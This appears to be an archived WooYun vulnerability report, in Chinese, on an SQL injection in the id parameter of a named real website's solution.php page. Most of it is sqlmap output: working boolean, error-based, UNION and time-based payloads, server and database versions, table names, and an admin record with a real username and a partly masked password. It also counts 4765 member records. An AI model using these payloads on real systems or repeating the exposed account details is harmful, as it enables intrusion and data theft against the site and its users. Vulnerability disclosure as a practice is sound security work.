乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-03: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-05-18: 厂商已经主动忽略漏洞,细节向公众公开
哇咔咔
注射点http://www.earthhour.org.cn/solution.php?id=506
---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=506 AND 7359=7359 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=506 AND (SELECT 7312 FROM(SELECT COUNT(*),CONCAT(0x716f6e6671,(SELECT (CASE WHEN (7312=7312) THEN 1 ELSE 0 END)),0x7176697371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 16 columns Payload: id=-3493 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f6e6671,0x54625769545364676254,0x7176697371),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=506 AND SLEEP(5)---
web server operating system: Linux CentOS 5.8web application technology: Apache 2.2.3, PHP 5.3.8back-end DBMS: MySQL 5.0
current user: 'earthhour2014@localhost'
Database: earthhour2014[6 tables]+--------------+| eh_adminuser || eh_article || eh_member || eh_message || eh_news || ogilvy_sign |+--------------+
Database: earthhour2014Table: eh_adminuser[1 entry]+----+------------+---------------------+------------------+| id | admin_user | update_time | admin_password |+----+------------+---------------------+------------------+| 1 | peterson | 2014-03-10 22:20:49 | dn6*******f4v(部分马赛克) |+----+------------+---------------------+------------------+
member表的用户数据数量
[19:31:36] [INFO] the SQL query used returns 4765 entries
过滤
未能联系到厂商或者厂商积极拒绝